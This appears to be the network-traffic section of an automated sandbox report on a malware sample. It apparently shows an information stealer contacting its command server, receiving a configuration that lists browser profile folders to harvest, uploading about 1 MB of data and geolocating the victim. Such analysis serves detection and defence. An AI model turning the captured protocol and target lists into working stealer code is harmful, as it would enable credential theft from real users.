                                                                                                  Feb 19, 2025 15:38:18.539187908 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539197922 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539206028 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539215088 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539222956 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539230108 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539238930 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539246082 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539249897 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539258003 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539262056 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539264917 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539268017 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539271116 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539273977 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539277077 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539279938 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.539283037 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541421890 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541435003 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541444063 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541452885 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541460991 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541470051 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541479111 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541486979 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541496038 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541503906 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541512012 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541521072 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541529894 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541538954 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541547060 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541558981 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541567087 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541575909 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541584969 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541593075 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541596889 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541605949 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541614056 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541624069 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541631937 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541641951 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541652918 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541661978 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541670084 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541680098 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541690111 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541698933 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541707039 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541716099 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541724920 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541735888 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541743994 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541753054 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541760921 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541769981 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541786909 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541800976 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541809082 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.541817904 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545079947 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545090914 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545100927 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545109987 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545119047 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545126915 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545135975 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545145035 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545155048 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545164108 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545171976 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545181036 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545190096 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545198917 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545207977 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545221090 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545231104 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545238972 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545248032 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545257092 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545265913 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545274973 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545284986 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545294046 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545303106 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545314074 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545322895 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545331001 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545335054 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545337915 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545341969 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545350075 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545357943 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545367956 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545377016 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545386076 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545396090 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545406103 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545416117 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545419931 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545423985 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545427084 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.545429945 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546365976 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546379089 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546387911 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546396017 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546405077 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546412945 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546422005 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546432018 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546439886 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546447992 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546457052 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546467066 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546474934 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546483994 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546497107 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546504974 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546513081 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546521902 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546530008 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546539068 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546547890 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546550989 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546555042 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546557903 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546561956 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546571016 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546581030 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546590090 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546597958 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546607018 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546616077 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546624899 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546634912 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546643972 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546652079 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546667099 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546680927 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546684980 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546693087 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546704054 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546711922 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546720982 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.546730042 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.549926043 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.549938917 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.549947977 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:18.549957037 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:20.905776024 CET3379149733103.84.89.222192.168.2.4
                                                                                                  Feb 19, 2025 15:38:20.926625967 CET4973333791192.168.2.4103.84.89.222
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Feb 19, 2025 15:38:10.718286991 CET5561953192.168.2.41.1.1.1
                                                                                                  Feb 19, 2025 15:38:10.725451946 CET53556191.1.1.1192.168.2.4
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Feb 19, 2025 15:38:10.718286991 CET192.168.2.41.1.1.10xbefaStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Feb 19, 2025 15:38:10.725451946 CET1.1.1.1192.168.2.40xbefaNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Feb 19, 2025 15:38:10.725451946 CET1.1.1.1192.168.2.40xbefaNo error (0)api.ip.sb.cdn.cloudflare.net104.26.13.31A (IP address)IN (0x0001)false
                                                                                                  Feb 19, 2025 15:38:10.725451946 CET1.1.1.1192.168.2.40xbefaNo error (0)api.ip.sb.cdn.cloudflare.net104.26.12.31A (IP address)IN (0x0001)false
                                                                                                  Feb 19, 2025 15:38:10.725451946 CET1.1.1.1192.168.2.40xbefaNo error (0)api.ip.sb.cdn.cloudflare.net172.67.75.172A (IP address)IN (0x0001)false
                                                                                                  • api.ip.sb
                                                                                                  • 103.84.89.222:33791
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449731103.84.89.222337917300C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Feb 19, 2025 15:38:04.119239092 CET240OUTPOST / HTTP/1.1
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                  Host: 103.84.89.222:33791
                                                                                                  Content-Length: 137
                                                                                                  Expect: 100-continue
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Connection: Keep-Alive
                                                                                                  Feb 19, 2025 15:38:05.015418053 CET359INHTTP/1.1 200 OK
                                                                                                  Content-Length: 212
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                  Date: Wed, 19 Feb 2025 14:38:04 GMT
                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                  Feb 19, 2025 15:38:10.073292971 CET223OUTPOST / HTTP/1.1
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                  Host: 103.84.89.222:33791
                                                                                                  Content-Length: 144
                                                                                                  Expect: 100-continue
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Feb 19, 2025 15:38:10.393866062 CET25INHTTP/1.1 100 Continue
                                                                                                  Feb 19, 2025 15:38:10.676065922 CET1236INHTTP/1.1 200 OK
                                                                                                  Content-Length: 5051
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                  Date: Wed, 19 Feb 2025 14:38:10 GMT
                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449733103.84.89.222337917300C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Feb 19, 2025 15:38:14.445687056 CET222OUTPOST / HTTP/1.1
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                  Host: 103.84.89.222:33791
                                                                                                  Content-Length: 1088753
                                                                                                  Expect: 100-continue
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Feb 19, 2025 15:38:18.489167929 CET294INHTTP/1.1 200 OK
                                                                                                  Content-Length: 147
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                  Date: Wed, 19 Feb 2025 14:38:18 GMT
                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                  Feb 19, 2025 15:38:18.492100954 CET218OUTPOST / HTTP/1.1
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                  Host: 103.84.89.222:33791
                                                                                                  Content-Length: 1088745
                                                                                                  Expect: 100-continue
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Feb 19, 2025 15:38:20.905776024 CET408INHTTP/1.1 200 OK
                                                                                                  Content-Length: 261
                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                  Date: Wed, 19 Feb 2025 14:38:20 GMT
                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449732104.26.13.314437300C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-02-19 14:38:11 UTC64OUTGET /geoip HTTP/1.1
                                                                                                  Host: api.ip.sb
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-02-19 14:38:11 UTC947INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 19 Feb 2025 14:38:11 GMT
                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  vary: Accept-Encoding
                                                                                                  Cache-Control: no-cache
                                                                                                  access-control-allow-origin: *
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNza5OONLvo7qkkawHMA7MnYrEjbLt4UT%2Bu9%2F5LOtOjNwzmVRnzDQ3VZXQLtP7UVdoDTb2%2BUN0xrc2%2BztTw%2FY7dJfDN66vEbEzpJVfMRvkQkM1j%2BKRozQTqOUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 9146ffca38a01835-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1513&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2806&recv_bytes=678&delivery_rate=1929940&cwnd=139&unsent_bytes=0&cid=99f7ce36377c9152&ts=667&x=0"
                                                                                                  2025-02-19 14:38:11 UTC351INData Raw: 31 35 38 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 36 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6f 66 66 73 65 74 22 3a 2d 31 38 30 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 61 74 69 74 75 64 65
                                                                                                  Data Ascii: 158{"organization":"CenturyLink","longitude":-74.0066,"city":"New York","timezone":"America\/New_York","isp":"CenturyLink","offset":-18000,"region":"New York","asn":3356,"asn_organization":"LEVEL3","country":"United States","ip":"8.46.123.189","latitude
                                                                                                  2025-02-19 14:38:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:09:38:02
                                                                                                  Start date:19/02/2025
